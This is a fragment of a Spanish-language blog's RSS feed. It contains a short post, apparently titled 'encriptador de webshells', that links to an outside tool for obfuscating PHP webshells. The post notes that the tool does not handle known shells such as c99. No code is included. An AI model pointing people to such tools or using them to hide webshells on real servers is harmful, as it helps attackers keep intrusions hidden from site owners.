				<category><![CDATA[PHP]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=382</guid>
		<description><![CDATA[No sirve para c99, emelco o alguna de esas. Hay que hacerla a propósito para esto, pero los resultados están buenos http://xd-blog.com.ar/makeshell/<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=382&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>No sirve para c99, emelco o alguna de esas. Hay que hacerla a propósito para esto, pero los resultados están buenos</p>
<p><a href="http://xd-blog.com.ar/makeshell/">http://xd-blog.com.ar/makeshell/</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/382/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/382/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/382/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/382/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/382/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/382/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/382/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/382/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/382/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/382/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/382/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/382/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/382/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/382/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=382&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/03/24/encriptador-de-webshells/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>
	</item>
	</channel>
</rss>
